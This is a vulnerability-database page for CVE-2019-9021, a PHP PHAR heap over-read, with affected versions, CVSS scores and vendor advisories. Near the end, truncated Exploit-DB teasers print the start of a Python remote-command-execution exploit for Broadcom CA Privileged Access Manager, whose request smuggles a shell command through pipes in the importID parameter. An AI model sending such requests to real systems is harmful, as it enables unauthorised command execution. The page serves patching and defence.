CVE-2019-9021
published 2019-02-22CVE-2019-9021: An issue was discovered in PHP before 5.6.40, 7.x before 7.1.26, 7.2.x before 7.2.14, and 7.3.x before 7.3.1. A heap-based buffer over-read in PHAR reading…
PriorityP351critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
EPSS
10.06%
95.0th percentile
An issue was discovered in PHP before 5.6.40, 7.x before 7.1.26, 7.2.x before 7.2.14, and 7.3.x before 7.3.1. A heap-based buffer over-read in PHAR reading functions in the PHAR extension may allow an attacker to read allocated or unallocated memory past the actual data when trying to parse the file name, a different vulnerability than CVE-2018-20783. This is related to phar_detect_phar_fname_ext in ext/phar/phar.c.
Affected
10 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| canonical | ubuntu_linux | — | — |
| canonical | ubuntu_linux | — | — |
| canonical | ubuntu_linux | — | — |
| debian | debian_linux | — | — |
| opensuse | leap | — | — |
| php | php | < 5.6.40 | 5.6.40 |
| php | php | >= 7.0.0 < 7.1.26 | 7.1.26 |
| php | php | >= 7.2.0 < 7.2.14 | 7.2.14 |
| php | php | >= 7.3.0 < 7.3.1 | 7.3.1 |
| php5 | php5 | >= 0 < 5.5.9+dfsg-1ubuntu4.27 | 5.5.9+dfsg-1ubuntu4.27 |
CVSS provenance
nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
osv9.8CRITICAL
vendor_ubuntu9.8CRITICAL
vendor_redhat7.5HIGH
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
CISA ICS
Festo Didactic SE MES PC
cisa_ics·2026-01-27·CVSS 7.5
[HIGH] Festo Didactic SE MES PC
ICS Advisory
##
Festo Didactic SE MES PC
Release DateJanuary 27, 2026
Alert CodeICSA-26-027-02
Related topics:
Industrial Control System Vulnerabilities, Industrial Control Systems
View CSAF
## Summary
MES PCs shipped with Windows 10 come pre-installed with XAMPP. XAMPP is a bundle of third-party open-source applications including the Apache HTTP Server, the MariaDB database and more. From time to time, vulnerabilities in these applications are discovered. These are fixed in newer versions of XAMPP by updating the bundled applications. MES PCs shipped with Windows 10 include a copy of XAMPP which contains around 140 such vulnerabilities listed in this advisory. They can be fixed by replacing XAMPP with Festo Didactic's Factory Control Panel application.
The
Ubuntu
PHP vulnerabilities
vendor_ubuntu·2019-03-12·CVSS 9.8
CVE-2019-9020 [CRITICAL] PHP vulnerabilities
Title: PHP vulnerabilities
Summary: Several security issues were fixed in PHP.
USN-3902-1 fixed a vulnerability in PHP. This update provides
the corresponding update for Ubuntu 12.04 ESM.
Original advisory details:
It was discovered that the PHP XML-RPC module incorrectly handled decoding
XML data. A remote attacker could possibly use this issue to cause PHP to
crash, resulting in a denial of service. (CVE-2019-9020, CVE-2019-9024)
It was discovered that the PHP PHAR module incorrectly handled certain
filenames. A remote attacker could possibly use this issue to cause PHP to
crash, resulting in a denial of service. (CVE-2019-9021)
It was discovered that PHP incorrectly handled mbstring regular
expressions. A remote attacker could possibly use this issue to cause PHP
to crash, resulti
Ubuntu
PHP vulnerabilities
vendor_ubuntu·2019-03-06·CVSS 9.8
CVE-2019-9020 [CRITICAL] PHP vulnerabilities
Title: PHP vulnerabilities
Summary: Several security issues were fixed in PHP.
It was discovered that the PHP XML-RPC module incorrectly handled decoding
XML data. A remote attacker could possibly use this issue to cause PHP to
crash, resulting in a denial of service. (CVE-2019-9020, CVE-2019-9024)
It was discovered that the PHP PHAR module incorrectly handled certain
filenames. A remote attacker could possibly use this issue to cause PHP to
crash, resulting in a denial of service. (CVE-2019-9021)
It was discovered that PHP incorrectly parsed certain DNS responses. A
remote attacker could possibly use this issue to cause PHP to crash,
resulting in a denial of service. This issue only affected Ubuntu 16.04
LTS. (CVE-2019-9022)
It was discovered that PHP incorrectly handled mbstring reg
Red Hat
php: Heap-based buffer over-read in PHAR reading functions
vendor_redhat·2018-12-06·CVSS 7.5
CVE-2019-9021 [HIGH] CWE-122 php: Heap-based buffer over-read in PHAR reading functions
php: Heap-based buffer over-read in PHAR reading functions
An issue was discovered in PHP before 5.6.40, 7.x before 7.1.26, 7.2.x before 7.2.14, and 7.3.x before 7.3.1. A heap-based buffer over-read in PHAR reading functions in the PHAR extension may allow an attacker to read allocated or unallocated memory past the actual data when trying to parse the file name, a different vulnerability than CVE-2018-20783. This is related to phar_detect_phar_fname_ext in ext/phar/phar.c.
Package: php (Red Hat Enterprise Linux 5) - Out of support scope
Package: php (Red Hat Enterprise Linux 6) - Out of support scope
Package: php (Red Hat Enterprise Linux 7) - Fix deferred
Package: rh-php70-php (Red Hat Software Collections) - Fix deferred
GHSA
GHSA-3fr9-q295-2jq3: An issue was discovered in PHP before 5
ghsa_unreviewed·2022-05-14·CVSS 7.5
CVE-2019-9021 [HIGH] CWE-125 GHSA-3fr9-q295-2jq3: An issue was discovered in PHP before 5
An issue was discovered in PHP before 5.6.40, 7.x before 7.1.26, 7.2.x before 7.2.14, and 7.3.x before 7.3.1. A heap-based buffer over-read in PHAR reading functions in the PHAR extension may allow an attacker to read allocated or unallocated memory past the actual data when trying to parse the file name, a different vulnerability than CVE-2018-20783. This is related to phar_detect_phar_fname_ext in ext/phar/phar.c.
OSV
php5, php7.0 vulnerabilities
osv·2019-03-06·CVSS 9.8
CVE-2019-9020 [CRITICAL] php5, php7.0 vulnerabilities
php5, php7.0 vulnerabilities
It was discovered that the PHP XML-RPC module incorrectly handled decoding
XML data. A remote attacker could possibly use this issue to cause PHP to
crash, resulting in a denial of service. (CVE-2019-9020, CVE-2019-9024)
It was discovered that the PHP PHAR module incorrectly handled certain
filenames. A remote attacker could possibly use this issue to cause PHP to
crash, resulting in a denial of service. (CVE-2019-9021)
It was discovered that PHP incorrectly parsed certain DNS responses. A
remote attacker could possibly use this issue to cause PHP to crash,
resulting in a denial of service. This issue only affected Ubuntu 16.04
LTS. (CVE-2019-9022)
It was discovered that PHP incorrectly handled mbstring regular
expressions. A remote attacker could possibly
OSV
CVE-2019-9021: An issue was discovered in PHP before 5
osv·2019-02-22·CVSS 7.5
CVE-2019-9021 [HIGH] CVE-2019-9021: An issue was discovered in PHP before 5
An issue was discovered in PHP before 5.6.40, 7.x before 7.1.26, 7.2.x before 7.2.14, and 7.3.x before 7.3.1. A heap-based buffer over-read in PHAR reading functions in the PHAR extension may allow an attacker to read allocated or unallocated memory past the actual data when trying to parse the file name, a different vulnerability than CVE-2018-20783. This is related to phar_detect_phar_fname_ext in ext/phar/phar.c.
No detection rules found.
Exploit-DB
Integard Pro NoJs 2.2.0.9026 - Remote Buffer Overflow
exploitdb·2019-12-06·CVSS 9.8
CVE-2019-16702 [CRITICAL] Integard Pro NoJs 2.2.0.9026 - Remote Buffer Overflow
Integard Pro NoJs 2.2.0.9026 - Remote Buffer Overflow
---
Exploit Title: Integard Pro NoJs 2.2.0.9026 - Remote Buffer Overflow
Date: 2019-09-22
Exploit Author: purpl3f0xsecur1ty
Vendor Homepage: https://www.tucows.com/
Software Link: http://www.tucows.com/preview/519612/Integard-Home
Version: Pro 2.2.0.9026 / Home 2.0.0.9021
Tested on: Windows XP / Win7 / Win10
CVE: CVE-2019-16702
#!/usr/bin/python
########################################################
#~Integard Pro 2.2.0.9026 "NoJs" EIP overwrite exploit~#
#~~~~~~~~~~~~~~~~Authored by purpl3f0x~~~~~~~~~~~~~~~~~#
# The vulnerability: Integard fails to sanitize input #
# to the "NoJs" parameter in an HTTP POST request, #
# resulting in a stack buffer overflow that overwrites #
# the instruction pointer, leading to remote code #
# exec
Exploit-DB
Broadcom CA Privilged Access Manager 2.8.2 - Remote Command Execution
exploitdb·2019-12-05·CVSS 9.8
CVE-2018-9022 [CRITICAL] Broadcom CA Privilged Access Manager 2.8.2 - Remote Command Execution
Broadcom CA Privilged Access Manager 2.8.2 - Remote Command Execution
---
# Title: Broadcom CA Privilged Access Manager 2.8.2 - Remote Command Execution
# Author: Peter Lapp
# Date: 2019-12-05
# Vendor: https://techdocs.broadcom.com/us/product-content/recommended-reading/security-notices/ca20180614-01--security-notice-for-ca-privileged-access-manager.html
# CVE: CVE-2018-9021 and CVE-2018-9022
# Tested on: v2.8.2
import urllib2
import urllib
import ssl
import sys
import json
import base64
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
def send_command(ip, cmd):
cmd = urllib.quote_plus(cmd)
url = 'https://'+ip+'/ajax_cmd.php?cmd=AD_IMPORT&command=add&groupId=123&importID=|'+cmd+'+2>%261||&deviceMode=test'
request = urllib2.Request(url, N
http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00083.htmlhttp://lists.opensuse.org/opensuse-security-announce/2019-04/msg00104.htmlhttp://lists.opensuse.org/opensuse-security-announce/2019-06/msg00041.htmlhttp://lists.opensuse.org/opensuse-security-announce/2019-06/msg00044.htmlhttp://www.securityfocus.com/bid/106747http://www.securityfocus.com/bid/107156https://access.redhat.com/errata/RHSA-2019:2519https://access.redhat.com/errata/RHSA-2019:3299https://bugs.php.net/bug.php?id=77247https://security.netapp.com/advisory/ntap-20190321-0001/https://usn.ubuntu.com/3902-1/https://usn.ubuntu.com/3902-2/https://www.debian.org/security/2019/dsa-4398http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00083.htmlhttp://lists.opensuse.org/opensuse-security-announce/2019-04/msg00104.htmlhttp://lists.opensuse.org/opensuse-security-announce/2019-06/msg00041.htmlhttp://lists.opensuse.org/opensuse-security-announce/2019-06/msg00044.htmlhttp://www.securityfocus.com/bid/106747http://www.securityfocus.com/bid/107156https://access.redhat.com/errata/RHSA-2019:2519https://access.redhat.com/errata/RHSA-2019:3299https://bugs.php.net/bug.php?id=77247https://security.netapp.com/advisory/ntap-20190321-0001/https://usn.ubuntu.com/3902-1/https://usn.ubuntu.com/3902-2/https://www.debian.org/security/2019/dsa-4398
2019-02-22
Published